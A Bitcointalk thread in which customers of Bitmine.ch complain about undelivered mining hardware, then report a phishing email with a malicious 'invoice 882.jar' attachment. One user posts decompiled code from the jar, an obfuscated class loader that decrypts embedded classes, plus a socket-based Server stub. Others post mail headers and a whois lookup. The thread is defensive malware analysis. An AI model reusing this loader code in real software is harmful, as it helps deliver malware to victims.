|
Ultros
|
 |
August 13, 2014, 09:07:49 AM |
|
Datacenter is supposed to be ready in 2 days. Let's see how it turns out. Laugh at me all you want but I'm still kinda optimistic. That's probably the summer.  |
|
|
|
|
|
crocko
|
|
August 13, 2014, 11:06:33 AM
Last edit: August 13, 2014, 11:27:09 AM by crocko |
|
Datacenter is supposed to be ready in 2 days. Let's see how it turns out. Laugh at me all you want but I'm still kinda optimistic. That's probably the summer. Yea, they will start to mine and earn Bitcoins with our undelivered equipment ..  BTW, in my country,which is member of EU, the Bitmine.ch's partner BlackElectronics is pursued in justice and some of their members are hunted down right now by the Police.. Short story: they fail to deliver some very expensive ($5000 per TH/s) and modified ASICs with Bitmine.ch A1 chips, then they refused/delayed the refunds. |
Find my posts helpful? Click my Trust link and rep me!
| BTC: 1MqUxoDQE8Q88sDvoaLMbBJSMToSfPgKSy | | DOGE: D61Na9wjuneAn9GFLRNrHgWHHFwVfd1T7y | | LTC: 3Luo136zrqkCi53jT72FEY52GbwW1ZYi6X |
|
|
|
johny08
Legendary
 Offline
Activity: 1045
Merit: 1000
|
|
August 13, 2014, 08:12:17 PM |
|
Datacenter is supposed to be ready in 2 days. Let's see how it turns out. Laugh at me all you want but I'm still kinda optimistic. That's probably the summer. is it profitable? |
|
|
|
|
Dino50
Newbie
Offline
Activity: 42
Merit: 0
|
|
August 13, 2014, 08:27:24 PM |
|
I think the basic problem at bitmine now is that they expected that btc price will skyrocket to 10.000 USD or so but so far it has not so this could be one reason they have liquid money problem and now they dont intend to sell their btc-s and pay Us. However the interesting story for Me is that why did they invest 3 M USD worth of equipment in the past couple months then.
Btw I have been also waiting for my cash since May. Very very annoying. Of course cash is the only good option to forget this terrible company. No other alternative can be accepted.
|
|
|
|
|
RealMalatesta
Legendary
Offline
Activity: 2366
Merit: 1132
|
|
August 13, 2014, 10:37:51 PM |
|
Datacenter is supposed to be ready in 2 days. Let's see how it turns out. Laugh at me all you want but I'm still kinda optimistic. That's probably the summer. is it profitable? You're like someone who asks if the baby will be a boy or a girl before having sex. |
|
|
|
|
kapanec
Newbie
Offline
Activity: 24
Merit: 0
|
|
August 14, 2014, 01:12:20 PM |
|
I think the basic problem at bitmine now is that they expected that btc price will skyrocket to 10.000 USD or so but so far it has not so this could be one reason they have liquid money problem and now they dont intend to sell their btc-s and pay Us. However the interesting story for Me is that why did they invest 3 M USD worth of equipment in the past couple months then.
Btw I have been also waiting for my cash since May. Very very annoying. Of course cash is the only good option to forget this terrible company. No other alternative can be accepted.
So they say, but we have good reason to doubt this If I have 3 M in cash and 400 K debt I will pay debt at first and invest the rest. This is reasonable. |
|
|
|
|
Karlog
Member
Offline
Activity: 66
Merit: 10
|
|
August 14, 2014, 02:39:27 PM |
|
Did anyone else recive an invoice from bitmine today?
I just got a blank mail with subject: Invoice Payment
and a .jar file witch i don't know what to do with.
... i hope its about my refund..
|
|
|
|
|
|
Collider
|
|
August 14, 2014, 02:40:30 PM |
|
jar are java executable and could contain a virus.
|
|
|
|
|
matt4054
Legendary
Offline
Activity: 1946
Merit: 1035
|
|
August 14, 2014, 02:45:34 PM
Last edit: August 14, 2014, 03:16:09 PM by matt4054 |
|
Did anyone else recive an invoice from bitmine today?
I just got a blank mail with subject: Invoice Payment
and a .jar file witch i don't know what to do with.
... i hope its about my refund..
I just received the virus as well in my inbox. So, Bitmine has been hacked and customer data leaked. Well done. Yay  Sender's IP can be traced back to T-Mobile USA. If I get bored maybe I'll care to dissect the JAR in a fully insulated VM. The funny thing is, when you try to report it to abuse@smtp.com, you get blocked from their mail exchanger with: Diagnostic-Code: smtp; 550 5.7.1 Virus found. So, their ABUSE address is filtering INBOUND messages, while their OUTBOUND servers let them through. Yay |
|
|
|
|
mvma
Newbie
Offline
Activity: 25
Merit: 0
|
|
August 14, 2014, 03:24:52 PM |
|
 Yes, the same here. I have received a blank email with the title "Invoice Payment " and a attached file "invoice 882.jar". I'm checking my computer for a virus infection. Don't try open the attached file. That company is realy bad 
|
|
|
|
|
matt4054
Legendary
Offline
Activity: 1946
Merit: 1035
|
|
August 14, 2014, 03:35:09 PM |
|
Yes, the same here. I have received a blank email with the title "Invoice Payment " and a attached file "invoice 882.jar". I'm checking my computer for a virus infection. Don't try open the attached file. Same filename for me. At best it means that "only" customer e-mail addresses have been leaked, but that's just the best case scenario. Those who used a non-unique password for Bitmine should change it wherever they used the same one (hopefully their framework/CMS is hashing and salting passwords wisely but we should assume the worst with them...) As for the Java file, for those who ran it already, expect some nasty shit to hit the fan soon, so sanitize your system ASAP That company is realy bad Oh yes they are. My my my... (facepalm) |
|
|
|
|
akumaburn
Sr. Member
Offline
Activity: 281
Merit: 250
The Gold Standard of Digital Currency.
|
|
August 14, 2014, 03:44:28 PM |
|
Yes, the same here. I have received a blank email with the title "Invoice Payment " and a attached file "invoice 882.jar". I'm checking my computer for a virus infection. Don't try open the attached file. Same filename for me. At best it means that "only" customer e-mail addresses have been leaked, but that's just the best case scenario. Those who used a non-unique password for Bitmine should change it wherever they used the same one (hopefully their framework/CMS is hashing and salting passwords wisely but we should assume the worst with them...) As for the Java file, for those who ran it already, expect some nasty shit to hit the fan soon, so sanitize your system ASAP That company is realy bad Oh yes they are. My my my... (facepalm) Jar file appears to try to change some system registry keys.. The file itself is obsuficated with ALLATORI demo version.. however standard deobsufication applications have not worked. I may go through it at a later date today... Shame on bitmine... I honestly thought this was a refund notice or something.. but then I noticed it was a JAR file.. I figured maybe this was their way of showing invoices to everyone on different platforms.. still does not explain the fact that when I ran it on my test system (outside my firewalls) nothing displayed. Clear cut virus most likely. |
|
|
|
|
akumaburn
Sr. Member
Offline
Activity: 281
Merit: 250
The Gold Standard of Digital Currency.
|
|
August 14, 2014, 03:55:44 PM |
|
Here is the Main.class JAD output: // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3)
// Source File Name: b
import java.io.*;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.HashMap;
import java.util.jar.JarEntry;
import java.util.jar.JarInputStream;
public class Main extends ClassLoader
{
public Class findClass(String IIiiIiIIiI)
{
Class IIiiIiIIiI;
if((IIiiIiIIiI = (Class)this.IIiiIiIIiI.get(IIiiIiIIiI)) == null) goto _L2; else goto _L1
_L1:
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR dup_x1 ;
resolveClass();
return;
_L2:
byte IIiiIiIIiI[];
try
{
return findSystemClass(IIiiIiIIiI);
}
catch(ClassNotFoundException IIiiIiIIiI)
{
IIiiIiIIiI = (byte[])iiiIiiIiIi.get(IIiiIiIIiI);
}
IIiiIiIIiI = ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(IIiiIiIIiI, IIiiIiIIiI);
this.IIiiIiIIiI.put(IIiiIiIIiI, IIiiIiIIiI);
return IIiiIiIIiI;
}
private byte[] iiIiiIiiIi(byte IIiiIiIIiI[], String IIiiIiIIiI)
{
String IIiiIiIIiI;
byte IIiiIiIIiI[];
IIiiIiIIiI = (new StringBuilder()).insert(0, IIiiIiIIiI).append(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("u\007NaJ#x\f/}VEv\006W\"s\016\\}NzI")).toString();
IIiiIiIIiI = IIiiIiIIiI;
257;
true;
true;
JVM INSTR pop2 ;
new int[];
true;
true;
JVM INSTR pop2 ;
int IIiiIiIIiI[];
IIiiIiIIiI;
257;
true;
true;
JVM INSTR pop2 ;
new int[];
true;
true;
JVM INSTR pop2 ;
int IIiiIiIIiI[];
IIiiIiIIiI;
0;
true;
true;
JVM INSTR pop2 ;
JVM INSTR dup ;
int IIiiIiIIiI;
IIiiIiIIiI;
_L3:
256;
true;
true;
JVM INSTR pop2 ;
JVM INSTR icmpge 85;
goto _L1 _L2
_L1:
IIiiIiIIiI++;
IIiiIiIIiI[IIiiIiIIiI] = IIiiIiIIiI;
IIiiIiIIiI;
goto _L3
_L2:
false;
true;
true;
JVM INSTR pop2 ;
int IIiiIiIIiI;
IIiiIiIIiI;
0;
true;
true;
JVM INSTR pop2 ;
JVM INSTR dup ;
IIiiIiIIiI;
_L8:
256;
true;
true;
JVM INSTR pop2 ;
JVM INSTR icmpge 145;
goto _L4 _L5
_L4:
if(IIiiIiIIiI != IIiiIiIIiI.length()) goto _L7; else goto _L6
_L6:
false;
true;
true;
JVM INSTR pop2 ;
IIiiIiIIiI;
_L7:
IIiiIiIIiI++;
IIiiIiIIiI++;
IIiiIiIIiI[IIiiIiIIiI] = IIiiIiIIiI.charAt(IIiiIiIIiI);
IIiiIiIIiI;
goto _L8
_L5:
false;
true;
true;
JVM INSTR pop2 ;
IIiiIiIIiI;
0;
true;
true;
JVM INSTR pop2 ;
JVM INSTR dup ;
IIiiIiIIiI;
_L11:
256;
true;
true;
JVM INSTR pop2 ;
JVM INSTR icmpge 221;
goto _L9 _L10
_L9:
IIiiIiIIiI + IIiiIiIIiI[IIiiIiIIiI] + IIiiIiIIiI[IIiiIiIIiI];
256;
true;
true;
JVM INSTR pop2 ;
JVM INSTR irem ;
IIiiIiIIiI;
IIiiIiIIiI;
int IIiiIiIIiI = (char)IIiiIiIIiI[IIiiIiIIiI];
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR dup_x2 ;
IIiiIiIIiI;
JVM INSTR iaload ;
JVM INSTR iastore ;
IIiiIiIIiI;
IIiiIiIIiI;
IIiiIiIIiI++;
JVM INSTR iastore ;
IIiiIiIIiI;
goto _L11
_L10:
false;
true;
true;
JVM INSTR pop2 ;
JVM INSTR dup ;
IIiiIiIIiI;
IIiiIiIIiI;
0;
true;
true;
JVM INSTR pop2 ;
JVM INSTR dup ;
int IIiiIiIIiI;
IIiiIiIIiI;
_L14:
IIiiIiIIiI.length;
JVM INSTR icmpge 435;
goto _L12 _L13
_L12:
IIiiIiIIiI;
1;
1;
1;
JVM INSTR pop2 ;
JVM INSTR iadd ;
256;
true;
true;
JVM INSTR pop2 ;
JVM INSTR irem ;
IIiiIiIIiI;
IIiiIiIIiI + IIiiIiIIiI[IIiiIiIIiI];
256;
true;
true;
JVM INSTR pop2 ;
JVM INSTR irem ;
IIiiIiIIiI;
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR dup2 ;
IIiiIiIIiI;
JVM INSTR iaload ;
(char);
IIiiIiIIiI;
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR dup_x2 ;
IIiiIiIIiI;
JVM INSTR iaload ;
JVM INSTR iastore ;
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR iastore ;
IIiiIiIIiI;
JVM INSTR iaload ;
IIiiIiIIiI[IIiiIiIIiI];
JVM INSTR iadd ;
256;
true;
true;
JVM INSTR pop2 ;
JVM INSTR irem ;
JVM INSTR iaload ;
(char);
int IIiiIiIIiI;
IIiiIiIIiI;
230;
true;
true;
JVM INSTR pop2 ;
new byte[];
true;
true;
JVM INSTR pop2 ;
byte IIiiIiIIiI[];
IIiiIiIIiI;
1;
IIiiIiIIiI;
JVM INSTR dup_x1 ;
1;
IIiiIiIIiI;
2;
IIiiIiIIiI;
1;
IIiiIiIIiI;
JVM INSTR dup_x1 ;
1;
1;
IIiiIiIIiI;
JVM INSTR dup_x1 ;
true;
true;
JVM INSTR pop2 ;
127;
1;
JVM INSTR dup_x1 ;
JVM INSTR dup ;
JVM INSTR pop2 ;
JVM INSTR bastore ;
true;
true;
JVM INSTR pop2 ;
42;
true;
true;
JVM INSTR pop2 ;
JVM INSTR bastore ;
true;
true;
JVM INSTR pop2 ;
32;
true;
true;
JVM INSTR pop2 ;
JVM INSTR bastore ;
true;
true;
JVM INSTR pop2 ;
9;
true;
true;
JVM INSTR pop2 ;
JVM INSTR bastore ;
IIiiIiIIiI;
JVM INSTR dup_x1 ;
IIiiIiIIiI;
JVM INSTR baload ;
IIiiIiIIiI;
JVM INSTR ixor ;
(byte);
JVM INSTR bastore ;
true;
true;
JVM INSTR pop2 ;
86;
true;
true;
JVM INSTR pop2 ;
JVM INSTR bastore ;
true;
true;
JVM INSTR pop2 ;
42;
true;
true;
JVM INSTR pop2 ;
JVM INSTR bastore ;
true;
true;
JVM INSTR pop2 ;
32;
true;
true;
JVM INSTR pop2 ;
IIiiIiIIiI++;
JVM INSTR bastore ;
IIiiIiIIiI;
goto _L14
_L13:
return IIiiIiIIiI;
}
public static String ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(String IIiiIiIIiI)
{
JVM INSTR new #68 <Class String>;
JVM INSTR dup ;
JVM INSTR new #222 <Class StringBuffer>;
JVM INSTR dup ;
(new Exception()).getStackTrace()[1];
JVM INSTR dup_x2 ;
getClassName();
StringBuffer();
JVM INSTR swap ;
getMethodName();
0;
JVM INSTR swap ;
insert();
toString();
JVM INSTR dup ;
length();
1;
JVM INSTR isub ;
(2 ^ 5) << 4 ^ 1 << 1;
(2 ^ 5) << 4 ^ 2 << 1;
5 << 4 ^ (3 << 2 ^ 1);
int j1 = IIiiIiIIiI.length();
j1;
new char[j1];
true;
true;
JVM INSTR pop2 ;
JVM INSTR swap ;
1;
JVM INSTR isub ;
JVM INSTR dup_x2 ;
int i;
i;
char ac[];
ac;
int i1;
i1;
int k;
k;
JVM INSTR pop ;
JVM INSTR swap ;
JVM INSTR dup ;
int j;
j;
int l;
l;
JVM INSTR swap ;
String s;
s;
goto _L1
_L6:
ac;
k;
IIiiIiIIiI;
i--;
JVM INSTR dup_x2 ;
charAt();
s.charAt(j);
JVM INSTR ixor ;
JVM INSTR ixor ;
(char);
JVM INSTR castore ;
if(i >= 0) goto _L3; else goto _L2
_L2:
ac;
goto _L4
_L3:
ac;
i1;
IIiiIiIIiI;
i;
JVM INSTR dup_x2 ;
charAt();
s.charAt(j);
JVM INSTR ixor ;
JVM INSTR ixor ;
(char);
i--;
j--;
JVM INSTR castore ;
if(j < 0)
j = l;
i;
_L1:
JVM INSTR ifge 106;
goto _L5 _L6
_L5:
ac;
_L4:
String();
return;
}
private byte[] ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(ByteArrayOutputStream IIiiIiIIiI)
throws IOException
{
IIiiIiIIiI.close();
return IIiiIiIIiI.toByteArray();
}
public Class loadClass(String IIiiIiIIiI)
throws ClassNotFoundException
{
return findClass(IIiiIiIIiI);
}
public synchronized void iiIiiIiiIi()
throws IOException
{
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR dup_x1 ;
getClass();
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("z^");
getResourceAsStream();
JVM INSTR dup ;
InputStream IIiiIiIIiI;
IIiiIiIIiI;
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
String IIiiIiIIiI;
IIiiIiIIiI;
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
IIiiIiIIiI;
1024;
true;
true;
JVM INSTR pop2 ;
new byte[];
true;
true;
JVM INSTR pop2 ;
byte IIiiIiIIiI[];
IIiiIiIIiI;
IIiiIiIIiI;
_L3:
IIiiIiIIiI;
read();
JVM INSTR dup ;
int IIiiIiIIiI;
IIiiIiIIiI;
-1;
true;
true;
JVM INSTR pop2 ;
JVM INSTR icmple 72;
goto _L1 _L2
_L1:
IIiiIiIIiI;
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
IIiiIiIIiI;
0;
true;
true;
JVM INSTR pop2 ;
IIiiIiIIiI;
write();
goto _L3
_L2:
IIiiIiIIiI;
IIiiIiIIiI;
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR dup_x2 ;
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
close();
close();
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
toByteArray();
IIiiIiIIiI;
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
JVM INSTR dup ;
JarInputStream IIiiIiIIiI;
IIiiIiIIiI;
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
JarEntry IIiiIiIIiI;
IIiiIiIIiI;
_L8:
String IIiiIiIIiI;
ByteArrayOutputStream IIiiIiIIiI;
if(IIiiIiIIiI.isDirectory())
continue; /* Loop/switch isn't completed */
IIiiIiIIiI = ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(IIiiIiIIiI);
IIiiIiIIiI = new ByteArrayOutputStream();
IIiiIiIIiI;
_L6:
IIiiIiIIiI;
read();
JVM INSTR dup ;
IIiiIiIIiI;
-1;
true;
true;
JVM INSTR pop2 ;
JVM INSTR icmple 163;
goto _L4 _L5
_L4:
IIiiIiIIiI;
IIiiIiIIiI;
IIiiIiIIiI;
0;
true;
true;
JVM INSTR pop2 ;
IIiiIiIIiI;
write();
goto _L6
_L5:
iiiIiiIiIi.put(IIiiIiIIiI, ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(IIiiIiIIiI));
iiIiiIiiIi(IIiiIiIIiI);
if((IIiiIiIIiI = IIiiIiIIiI.getNextJarEntry()) != null) goto _L8; else goto _L7
_L7:
IIiiIiIIiI.close();
return;
}
private String ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(JarEntry IIiiIiIIiI)
{
String IIiiIiIIiI;
return IIiiIiIIiI = (IIiiIiIIiI = (IIiiIiIIiI = IIiiIiIIiI.getName()).replace(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("5"), ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("4"))).replace(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("\022vX|@i"), "");
}
private String ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(InputStream IIiiIiIIiI)
throws IOException
{
InputStreamReader IIiiIiIIiI = new InputStreamReader(IIiiIiIIiI);
return (new BufferedReader(IIiiIiIIiI)).readLine();
}
public static void main(String IIiiIiIIiI[])
throws Exception
{
Main main1;
System.out.println(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("\037\027>\02093\032\0376\027>\0209\023:\0376\027>\02093\032\0376\027>\0209\023:\0376\027>\02093\032\0376\027>\0209\023:\0376>>\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\027\027\020:0\031\0345\024=\0239\0239\0375\024=\020:0\031\0346\027=\0209\0239\0376\027=\02090\031\0376\027=\023:\0209\0345\024>990\031\0345\024=\0239\020:\0346\024=\02390\031\0346\024>\023:\0239\0346\024>\02390\032\0345\027=\023:\0209\0345\024=\020\0203\031\0345\024=\023:\023:\0375\027=\023:3\031\0345\027>\020:\020:\0345\027=\020:3\032\0345\024>\023:\0209\0345\024=\0239\032\032\0345\024=\023:\020:\0346\024>\02090\032\0376\024>\0239\0209\0375\024>\02090\032\0346\024>\0209\0209\0345\024=\023:33\0375\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\03266\024RQ|Ej_t@t\\t0[E5uq_{DvN|\024RQ|eJ_t@rA:F,\022%\024YvW_\031\037\037\027=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0346>>\023:\0209\0345\024=\023:0QHaD'\0345GnK;Uq_{dVN|\032~\\w\0209\0345\024=\023:0\031\0345\027\027\020:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024>99\023:\0376\027>\02093\032\0376\027>\0209\023:\0376\027>\02093\032\0376\027>\0209\023:\0376\027>\02093\032\0376\027>\020\020"));
main1 = new Main();
"F@|An";
main1;
JVM INSTR dup_x1 ;
iiIiiIiiIi();
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
loadClass();
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("Y|Zt");
1;
1;
1;
JVM INSTR pop2 ;
new Class[];
true;
true;
JVM INSTR pop2 ;
JVM INSTR dup ;
0;
true;
true;
JVM INSTR pop2 ;
[Ljava/lang/String;;
JVM INSTR aastore ;
getMethod();
JVM INSTR dup ;
Method IIiiIiIIiI;
IIiiIiIIiI;
getModifiers();
JVM INSTR dup ;
int IIiiIiIIiI;
IIiiIiIIiI;
Modifier.isPublic();
JVM INSTR ifeq 115;
goto _L1 _L2
_L1:
break MISSING_BLOCK_LABEL_75;
_L2:
break MISSING_BLOCK_LABEL_115;
if(!Modifier.isStatic(IIiiIiIIiI))
break MISSING_BLOCK_LABEL_115;
IIiiIiIIiI;
null;
1;
1;
1;
JVM INSTR pop2 ;
new Object[];
true;
true;
JVM INSTR pop2 ;
JVM INSTR dup ;
0;
true;
true;
JVM INSTR pop2 ;
0;
true;
true;
JVM INSTR pop2 ;
new String[];
true;
true;
JVM INSTR pop2 ;
JVM INSTR aastore ;
invoke();
JVM INSTR pop ;
}
public Main()
throws IOException
{
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR dup_x1 ;
Main.getClassLoader();
ClassLoader();
JVM INSTR new #19 <Class ByteArrayOutputStream>;
IIiiIiIIiI;
JVM INSTR dup_x2 ;
JVM INSTR dup ;
JVM INSTR pop2 ;
JVM INSTR dup ;
ByteArrayOutputStream();
ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
JVM INSTR new #22 <Class HashMap>;
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR pop2 ;
JVM INSTR dup ;
HashMap();
IIiiIiIIiI;
JVM INSTR new #22 <Class HashMap>;
IIiiIiIIiI;
IIiiIiIIiI;
JVM INSTR pop2 ;
JVM INSTR dup ;
HashMap();
iiiIiiIiIi;
}
public InputStream getResourceAsStream(String IIiiIiIIiI)
{
byte IIiiIiIIiI[];
if((IIiiIiIIiI = (byte[])iiiIiiIiIi.get(IIiiIiIIiI.replace(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("5"), ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("4")).replace(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("\022vX|@i"), ""))) != null)
return new ByteArrayInputStream(IIiiIiIIiI);
else
return null;
}
private Class ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(String IIiiIiIIiI, byte IIiiIiIIiI[])
{
IIiiIiIIiI;
IIiiIiIIiI;
0;
true;
true;
JVM INSTR pop2 ;
IIiiIiIIiI;
JVM INSTR dup_x1 ;
JVM INSTR arraylength .length;
defineClass();
return;
}
private void iiIiiIiiIi(JarInputStream IIiiIiIIiI)
throws IOException
{
IIiiIiIIiI.closeEntry();
}
private InputStream ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd()
{
return getClass().getResourceAsStream(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("Jx^Y\177yF`3~\\"));
}
private JarEntry ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(JarInputStream IIiiIiIIiI)
throws IOException
{
return IIiiIiIIiI.getNextJarEntry();
}
private JarInputStream ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(byte IIiiIiIIiI[], String IIiiIiIIiI)
throws IOException
{
return new JarInputStream(new ByteArrayInputStream(iiIiiIiiIi(IIiiIiIIiI, IIiiIiIIiI)));
}
private final HashMap iiiIiiIiIi;
private final HashMap IIiiIiIIiI;
ByteArrayOutputStream ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
}
And the Server.class Jad output // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3)
// Source File Name: Server.java
package plugins;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.net.Socket;
import java.util.Properties;
public abstract class Server
{
public Server()
{
}
public abstract void onLine();
public abstract void offLine();
public abstract String getId();
public static Properties config;
public Socket socket;
public ObjectOutputStream out;
public ObjectInputStream in;
}
Will keep you posted. |
|
|
|
|
|
Collider
|
|
August 14, 2014, 03:56:21 PM |
|
It doesn´t neccesarilly mean that the data was leaked from bitmine, it could just be an email spoofing, virus spreading attack.
|
|
|
|
|
matt4054
Legendary
Offline
Activity: 1946
Merit: 1035
|
|
August 14, 2014, 04:02:14 PM |
|
It doesn´t neccesarilly mean that the data was leaked from bitmine, it could just be an email spoofing, virus spreading attack.
Theoretically yes, but Occam's razor says "no". I don't know about others but I find it funny that - I am a customer of Bitmine
- Virus was sent to the e-mail address that I registered with them (not my usual address)
- Virus was sent with the following envelope and header From:
Return-Path: <no-reply@bitmine.ch>
From: "invoice 882" <no-reply@bitmine.ch>
Of course they are spoofed, but the data is very, very, very likely to have leaked from them. This, and several reports from people here in such a tiny timeframe indicates a targeted attack, not a random, widespread one IMO. |
|
|
|
|
akumaburn
Sr. Member
Offline
Activity: 281
Merit: 250
The Gold Standard of Digital Currency.
|
|
August 14, 2014, 04:13:05 PM |
|
It doesn´t neccesarilly mean that the data was leaked from bitmine, it could just be an email spoofing, virus spreading attack.
The headers are real.. it is most likely from bitmine. Someone managed to hack their mail server. |
|
|
|
|
matt4054
Legendary
Offline
Activity: 1946
Merit: 1035
|
|
August 14, 2014, 04:15:45 PM
Last edit: August 14, 2014, 04:30:11 PM by matt4054 |
|
It doesn´t neccesarilly mean that the data was leaked from bitmine, it could just be an email spoofing, virus spreading attack.
The headers are real.. it is most likely from bitmine. Someone managed to hack their mail server. I wouldn't say that the *e-mails* containing the virus were from Bitmine. I would rather say that they were from some T-Mobile USA customer through SMTP.com But I would definitely say that the *data* (i.e. addresses, possibly more) were leaked from Bitmine servers in some way. By the way, Bitmine support has just acknowledged the virus by e-mail response to me ("we are investigating") Received: from [172.56.17.187] ([172.56.17.187:15292] helo=172.56.39.143)
by sl-mta06.smtp.com (envelope-from <no-reply@bitmine.ch>)
(ecelerity 3.5.5.39309 r(Platform:3.5.5.0)) with ESMTPA
id 2F/2C-09833-339CCE35; Thu, 14 Aug 2014 14:35:32 +0000
$ whois 172.56.17.187
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#
#
# Query terms are ambiguous. The query is assumed to be:
# "n 172.56.17.187"
#
# Use "?" to get help.
#
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=172.56.17.187?showDetails=true&showARIN=false&ext=netref2
#
NetRange: 172.32.0.0 - 172.63.255.255
CIDR: 172.32.0.0/11
OriginAS: AS21928
NetName: TMO9
NetHandle: NET-172-32-0-0-1
Parent: NET-172-0-0-0-0
NetType: Direct Allocation
RegDate: 2012-09-18
Updated: 2012-09-18
Ref: http://whois.arin.net/rest/net/NET-172-32-0-0-1
OrgName: T-Mobile USA, Inc.
OrgId: TMOBI
Address: 12920 SE 38th Street
City: Bellevue
StateProv: WA
PostalCode: 98006
Country: US
RegDate: 2003-01-02
Updated: 2012-07-13
Ref: http://whois.arin.net/rest/org/TMOBI
OrgTechHandle: DNSAD11-ARIN
OrgTechName: DNS Administrators
OrgTechPhone: +1-888-662-4662
OrgTechEmail: ARINtechcontact@t-mobile.com
OrgTechRef: http://whois.arin.net/rest/poc/DNSAD11-ARIN
OrgAbuseHandle: DNSAD11-ARIN
OrgAbuseName: DNS Administrators
OrgAbusePhone: +1-888-662-4662
OrgAbuseEmail: ARINtechcontact@t-mobile.com
OrgAbuseRef: http://whois.arin.net/rest/poc/DNSAD11-ARIN
#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#
Note: the attack *could* have been mitigated by Bitmine if they had implemented strict SPF DNS records on bitmine.ch |
|
|
|
|
|
jseppeli
|
|
August 14, 2014, 06:11:10 PM |
|
I just received an e-mail from Bitmine where they inform about these mails and says not to open the jar file
|
|
|
|
|
Wolke
Legendary
Offline
Activity: 966
Merit: 1000
|
|
August 14, 2014, 06:13:44 PM |
|
rofl
i got the same mail of shit
|
|
|
|
Karlog
Member
Offline
Activity: 66
Merit: 10
|
|
August 14, 2014, 06:58:52 PM |
|
It cloud also be malware, i just made a scan with malwarebytes, it found "PUP.Optinoal.InstallD.A" located at: C:\Windows\SysWOW64\installd.exe"
But i don't know what the virus / malware do...
Anyone found anything else?
|
|
|
|
|
|
